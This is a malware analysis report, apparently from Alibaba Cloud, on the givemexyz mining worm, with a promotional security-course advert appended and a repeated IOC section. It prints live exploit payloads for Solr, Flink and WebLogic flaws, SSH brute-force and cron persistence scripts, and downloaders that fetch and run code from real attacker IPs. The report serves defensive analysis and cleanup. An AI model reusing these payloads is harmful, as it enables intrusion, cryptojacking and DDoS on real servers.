1. Overview
Alibaba Cloud Security Center has monitored that the givemexyz mining family continues to be active on the cloud. This family spreads by using weak server passwords, web vulnerabilities, middleware vulnerabilities, etc. Moreover, this family uses bash, python, powershell and other malicious scripts to conduct batch attacks, and has the ability to spread across platforms. Due to its wide spread, large scope of influence, and the tendency to become more and more serious, it is necessary to make mistakes in the way it is used.
2. Detailed analysis
0x1: Exploit
First analyze the weaponized vulnerabilities used by the givemexyz family. Distinguished by vulnerability type, this family mainly uses Web RCE, middleware unauthorized access, and brute force cracking to attack.
Apache solr RCE vulnerability (CVE-2019-0193)
<datasource type="urldatasource"/> <script><![cdata[ function poc(){ java.lang.runtime.getruntime().exec("powershell iex(new-object net.webclient).downloadstring('http://209.141.40.190/xms.ps1')" ); } ]]></script> <document> <entity name="stackoverflow" url="https://stackoverflow.com/feeds/tag/solr" processor="xpathentityprocessor" foreach="/feed" transformer="script:poc" /> </document>
Apache Flink arbitrary file upload (CVE-2020-17518)
/jars/d847111f-cd11-4b14-b05a-9e38c3a2084a_check-execute.jar/run?entry-class=Execute & amp;program-args="nohup echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG 9wZW4oImh0dHA6Ly8yMDkuMTQxLjQwLjE5MC9lZS5weSIpLnJlYWQoKSkn | base64 -d | bash -"
Weblogic Console HTTP protocol RCE (CVE-2020-14882)
/console/css/%2e%2e%2fconsolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread (); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req. getHeader("cmd");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe ", "/c", "powershell iex(New-Object Net.WebClient).DownloadString('http://209.141.40.190/xms.ps1')"} : new String[]{ "/bin/sh", "-c", "curl -s http://209.141.40.190/xms | bash -sh; wget -q -O - http://209.141.40.190/xms | bash -sh; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8yMDkuMTQxLjQwLjE5MC9kLnB5IikucmVhZCgpKSc= | base64 -d | bash -; lwp-download http:// 209.141.40.190/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms"}; if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\A"). next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream( new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();')
Brute force cracking
In addition to exploiting the above-mentioned relatively new vulnerabilities, the givemexyz family is also using Weblogic WLS components (CVE-2017-10271), Hadoop
Unauthorized access, docker remote
API unauthorized access, Weblogic deserialization remote code execution (CVE-2019-2725) and other vulnerability exploits, and continue to use newly disclosed vulnerabilities for attack scanning.
Not only that, it can be seen from the “http://209.141.40.190/scan.sh” malicious script used by the attackers that this family has always built-in brute force scanning modules and continuously conducts external scans.
#!/bin/bash ip a | grep 'BROADCAST\|inet' | grep -oP 'inet\s + \K\d{1,3}\.\d{1,3}' | grep -v 127 | grep -v inet6 | grep -v 255 | head -n1 > /var/tmp/ranges.txt cat /var/tmp/ranges.txt | while read line; do nohup /var/tmp/scan $line.0.0-$line.255.255 22 > /var/tmp/ssh_vuln.txt cat /var/tmp/ssh_vuln.txt | grep 'OpenSSH' | awk '{print $1}' | uniq | shuf > /var/tmp/sshcheck nohup /var/tmp/hxx 300 -f /var/tmp/sshcheck /var/tmp/ps 22 'curl -s http://209.141.40.190/xms | bash -sh; wget -q -O - http: //209.141.40.190/xms | bash -sh; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8yMDkuMTQxLjQwLjE5MC9kLnB5IikucmVhZCgpKSc= | base64 -d | bash -; lwp-download http://209.141.40.190/xms /var/tmp/xms; bash /var/tmp/xms; rm -rf /var/tmp/xms' >/dev/null 2> & amp;1 done
Path | md5 | Function |
---|---|---|
/var/tmp/scan | b42183f226ab540fb07dd46088b382cf | Intranet SSH port scan |
/var/tmp/hxx | f0551696774f66ad3485445d9e3f7214 | SSH brute force cracking, remote execution of programs |
0x2: Malicious code analysis
The attacker exploits the vulnerability to remotely execute malicious script code on the victim’s machine.
If it is a Linux machine, execute the following command:
/bin/sh -c nohup echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8yMDkuMTQxLjQwLjE5MC9lZS5weSIpLnJlYWQoKSkn | base64 -d | bash - -> python -c 'import urllib;exec(urllib.urlopen("http://209.141.40.190/ee.py").read())'
The attack process of the givemexyz family Linux version is as follows:
Malicious file functions involved in the attack process:
File name | File type | File function |
---|---|---|
ee.py | python script | Payload delivery |
hxx | Binary program | SSH brute force cracking, remote execution of programs |
ps | text | Weak password account password dictionary |
scan | Binary program | Intranet SSH port scan |
scan.sh | bash script | Port scanning, brute force attack, lateral movement |
xms | bash script | Payload delivery, lateral movement through certificates, persistence implantation, killing competing products and security software, downloading and using mining software |
d.py/ dd.py | Python script | Payload delivery, implant persistence |
go | Binary program | Execute mining program |
dbusex | Binary program | Mining program |
b.py | python script | Payload delivery |
x64b/x32b | Binary program | DDOS attack, SYN flood, UDP flood, central control |
If it is a windows machine, execute the following command:
powershell iex(New-Object Net.WebClient).DownloadString('http://209.141.40.190/xms.ps1')
The attack process of the Windows version of the givemexyz family is as follows:
Malicious file functions involved in the attack process:
File name | File type | File function |
---|---|---|
xms.ps1 | powershell script | Payload delivery |
xmr32.exe/xmr64.exe | Binary program | Mining program |
mywindows.exe | Binary program | Mining program |
r.vbs | vbs script | Payload delivery, implant persistence |
nazi.exe | Binary program | Mining program, implanted persistence |
cudas.exe | Binary program | Mining program |
0x3: Persistence control
So that customers can clean up the persistence of this worm family, we focus on analyzing the persistence method of the givemexyz family.
The Linux version of the givemexyz family uses malicious scripts to implant scheduled tasks, self-starting items and backdoor programs for persistence control.
#!/bin/bash if [ $(ping -c 1 bash.givemexyz.in 2>/dev/null|grep "bytes of data" | wc -l ) -gt '0' ]; then url="bash.givemexyz.in" base="cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly9iYXNoLmdpdmVtZXh5ei5pbi9kZC5weSIpLnJlYWQoKSkn" else url="194.5.249.238" base="cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xOTQuNS4yNDkuMjM4L2QucHkiKS5yZWFkKCkpJw==" fi if if cat /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.hourly/oanacroner1 /etc/init. d/down | grep -q "205.185.116.78\|5.196.247.12\|bash.givemexyz.xyz\|cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8yM DUuMTg1LjExNi43OC9kLnB5IikucmVhZCgpKSc=\|209.141.40.190" then chattr -i -a /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.hourly/oanacroner1 /etc/ init.d/down crontab-r echo "Cron not found" echo -e "*/1 * * * * root (curl -s http://$url/xms||wget -q -O - http://$url/xms)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms\\ ##" > /etc/cron. d/root echo -e "*/2 * * * * root (curl -s http://$url/xms||wget -q -O - http://$url/xms)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms\\ ##" > /etc/cron. d/apache echo -e "*/3 * * * * root /dev/shm/dbusex -c $dns & amp; & amp; /home/`whoami`/dbusex -c $dns & amp; & amp; /var/ run/dbusex -c $dns & amp; & amp; /root/dbusex -c $dns\\ ##" > /etc/cron.d/nginx echo -e "*/30 * * * * (curl -s http://$url/xms||wget -q -O - http://$url/xms)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms\\ ; rm -rf /tmp/xms\\ ##" > /var/ spool/cron/root echo IyEvYmluL2Jhc2gKCmlmIFsgJChwaW5nIC1jIDEgYmFzaC5naXZlbWV4eXouaW4gMj4vZGV2L251bGx8Z3JlcCAiYnl0ZXMgb2YgZGF0YSIgfCB3YyAtbCApIC1ndCAnMCcgXTsKdGhlbgogICAgICAg IHVybD0iYmFzaC5naXZlbWV4eXouaW4iCiAgICAgICAgYmFzZT0iY0hsMGFHOXVJQzFqSUNkcGJYQnZjblFnZFhKc2JHbGlPMlY0WldNb2RYSnNiR2xpTG5WeWJHOXdaVzRvSW1oMGRIQTZMeTlpWVh Ob0xtZHBkbVZ0WlhoNWVpNXBiaTlrWkM1d2VTSXBMbkpsWVdRb0tTa24iCmVsc2UKICAgICAgICB1cmw9IjE5Nc41LjI0OS4yMzgiCiAgICAgICAgYmFzZT0iY0hsMGFHOXVJQzFqSUNkcGJYQnZjbl FnZFhKc2JHbGlPMlY0WldNb2RYSnNiR2xpTG5WeWJHOXdaVzRvSW1oMGRIQTZMeTh4T1RRdU5TNHlORGt1TWpNNEwyUXVjSGtpS1M1eVpXRmtLQ2twSnc9PSIKZmkKCmVjaG8gLWUgJyMhL2Jpbi9i YXNoCiMjIyBCRUdJTiBJTklUIElORk8KIyBQcm92aWRlczogICAgICAgICAgZG93bgojIFJlcXVpcmVkLVN0YXJ0OgojIFJlcXVpcmVkLVN0b3A6CiMgRGVmYXVsdC1TdGFydDogICAgIDIgMyA0IDUKIyBEZWZhdW x0LVN0b3A6CiMgU2hvcnQtRGVzY3JpcHRpb246IGRvd24gKGJ5IHB3bmVkKQojIyMgRU5EIElOSVQgSU5GTwooY3VybCAtZnNTTCBodHRwOi8vJHVybC94bXN8fHdnZXQgLXEgLU8tIGh0dHA6Ly 8kdXJsL3htcyl8YmFzaCAtc2g7IGVjaG8gJGJhc2UgfCBiYXNlNjQgLWQgfCBiYXNoIC07IGx3cC1kb3dubG9hZCBodHRwOi8vJHVybC94bXMgL3RtcC94bXM7IGJhc2ggL3RtcC94bXM7 IHJtIC1yZiAvdG1wL3htcycgPiAvZXRjL2luaXQuZC9kb3du | base64 -d | bash - mkdir -p /var/spool/cron/crontabs echo -e "* * * * * (curl -s http://$url/xms||wget -q -O - http://$url/xms)|bash -sh; echo $base | base64 - d | bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms\\ ##" > /var/spool/cron/crontabs /root mkdir -p /etc/cron.hourly echo "(curl -fsSL http://$url/xms||wget -q -O- http://$url/xms)|bash -sh; echo $base | base64 -d | bash -; lwp- download http://$url/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms" > /etc/cron.hourly/oanacroner1 | chmod 755 /etc/cron.hourly/oanacroner1 fi
Machines compromised by this worm can be self-diagnosed and cleaned based on the location where persistence is implanted.
import urllib import platform import os if platform.architecture()[0] == "64bit": urlx64 = "http://39.96.117.48/x64b" try: f = urllib.urlopen(urlx64) if f.code == 200: data = f.read() with open ("/tmp/x64b", "wb") as code: code.write(data) os.chmod("/tmp/x64b", 0o777) os.system("/tmp/x64b") except: pass else: urlx32 = "http://39.96.117.48/x32b" try: y = urllib.urlopen(urlx32) if y.code == 200: data = y.read() with open ("/tmp/x32b", "wb") as code: code.write(data) os.chmod("/tmp/x32b", 0o777) os.system("/tmp/x32b") except: pass
At the same time, the worm also uses Python to download malicious backdoor programs.
File name | MD5 | Binary function |
---|---|---|
/tmp/x64b, /tmp/x32b | c4d44eed4916675dd408ff0b3562fb1f | DDOS attack, SYN flood, UDP |
flood, medium Control |
The persistence method of the windows version is:
1. Persistence by releasing the shortcut to the auto-start folder:
The startup shortcut is released using the startup vbs script, which is as follows:
Set objFSO=CreateObject("Scripting.FileSystemObject") outFile="C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pFWPPQezaQ.url" Set objFile = objFSO.CreateTextFile(outFile,True) objFile.Write "[InternetShortcut]" & amp; vbCrLf & amp; "URL=""file:///C:\ProgramData\ALmRPARcYN\mywindows.exe""" objFile.Close
2. The method of writing startup items to the registry is used for persistence:
The sample will add its own program path to the registry startup list and disguise its name as a normal Oracle process.
Registry path: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\oracleservice.exe
At the same time, in order to avoid hiding, the sample will start a normal system white process as a puppet process to execute its own malicious code to avoid malicious detection.
If the user finds that the CPU usage of the normal process of his system soars, he can wonder whether the sample uses the normal system process as a shell for mining.
3. Family Judgment
Through the analysis of malicious files and the association of central control domain names/IPs, this incident can be associated with StartMiner (8220 mining family). In addition, on the original basis, on 2021-01-28
Mining for Windows systems was added at 03:28:41. Since the centrally controlled domain names used all contain the word givemexyz, we named the family givemexyz.
We calculated the activity coefficient of the givenmexyz family based on factors such as the change cycle of IOCs such as domain names/IPs, and the affected range. It can be seen that this family became active in the second half of 2019, and has a tendency to explode from the second half of 2020. The worm does not target specific industries for attacks, but instead uses vulnerabilities indiscriminately to move laterally.
4. Emergency response
Alibaba Cloud Security Center provides customers with comprehensive enterprise-level emergency response capabilities.
Threat detection
250+ threat detection models provide customers with full-link threat detection capabilities. We immediately capture and detect variant malicious scripts, malicious programs, and persistence used by worms.
Detect web vulnerabilities and middleware vulnerabilities used by the worm family:
Bash, python, powershell and other batch attack scripts used by worms are detected:
Detection of mining programs and backdoor programs used by worms:
defensive blocking
The Cloud Security Center not only conducts comprehensive detection of intrusion events, but we also provide prior defense and interception capabilities. Block malicious network connections, brute force attacks, malicious DNS connections, and malicious commands from the host level.
One-click cleanup
For the persistence technology used by the worm family, the Cloud Security Center provides closed-loop capabilities and can handle it with one click.
5. IoCs
The active IOCs of the givemexyz family this time are as follows:
IOC
http://209[.]141[.]40[.]190/xms.ps1
http://209[.]141[.]40[.]190/xms
http://209[.]141[.]40[.]190/scan.sh
http://39[.]96[.]117[.]48/x64
http://39[.]96[.]117[.]48/x32b
http://209[.]141[.]40[.]190/ee.py
http://209[.]141[.]40[.]190/hxx
http://209[.]141[.]40[.]190/ps
http://209[.]141[.]40[.]190/scan
http://209[.]141[.]40[.]190/d.py
http://194[.]5[.]249[.]238/x86_64
http://194[.]5[.]249[.]238/i686
http://194[.]5[.]249[.]238/go
http://bash[.]givemexyz[.]in/dd.py
http://194[.]5[.]249[.]238/d.py
http://209[.]141[.]40[.]190/xmr32.exe
http://209[.]141[.]40[.]190/xmr64.exe
http://209[.]141[.]40[.]190/mywindows.exe
http://209[.]141[.]40[.]190/nazi.exe
http://209[.]141[.]40[.]190/cudas.exe
6. Safety recommendations
1. We have opened some detection capabilities (malicious file detection) to free users of Alibaba Cloud. Free users can log in to the console of the Cloud Security Center to view alarm information, and use the alarm information to identify the source of intrusion and fix vulnerabilities.
2. Users of the enterprise version can turn on defense capabilities such as anti-virus and malicious network behavior to block them in advance. And you can perform a physical examination and cleaning through the virus defense function.
[.]190/xmr64.exe
http://209[.]141[.]40[.]190/mywindows.exe
http://209[.]141[.]40[.]190/nazi.exe
http://209[.]141[.]40[.]190/cudas.exe
6. Safety recommendations
1. We have opened some detection capabilities (malicious file detection) to free users of Alibaba Cloud. Free users can log in to the console of the Cloud Security Center to view alarm information, and use the alarm information to identify the source of intrusion and fix vulnerabilities.
2. Users of the enterprise version can turn on defense capabilities such as anti-virus and malicious network behavior to block them in advance. And you can perform a physical examination and cleaning through the virus defense function.
Network security learning route
This is an overview of the learning route outline for network security from basic to advanced. Friends, please remember to click and add it to your collection!
Edit
Phase 1: Basic Introduction
Introduction to Cybersecurity
Penetration Testing Basics
Network basics
Operating system basics
Web security basics
Database basics
Programming basics
CTF basics
After completing this stage, you can earn an annual salary of 150,000 +
Phase 2: Technical advancement (you are considered a beginner at this step)
Weak passwords and password blasting
XSS vulnerability
CSRF vulnerability
SSRF vulnerability
XXE vulnerability
SQL injection
Arbitrary file manipulation vulnerability
Business logic vulnerability
The annual salary after completing this stage is 250,000 +
Stage 3: High-level improvement
Deserialization vulnerability
RCE
Comprehensive shooting range practical project
Intranet penetration
Traffic Analysis
Log analysis
Malicious code analysis
Emergency Response
Practical training
After completing this stage, you can earn an annual salary of 300,000 +
Phase 4: Blue Team Course
Blue Team Basics
Blue team advanced
This section focuses on the defense of the blue team, the network security engineers who are more easily understood by everyone.
With both offense and defense, the annual salary can reach 400,000+
Phase 5: Interview Guide &Phase 6: Upgraded Content
You need the network security supporting videos, source codes and more network security related books & interview questions corresponding to the above roadmap.
If you are interested in getting started with network security, you can click here if you need it Big benefits of network security: Getting started & advanced full set of 282G learning resource package to share for free!
Students can scan the QR code below to get it!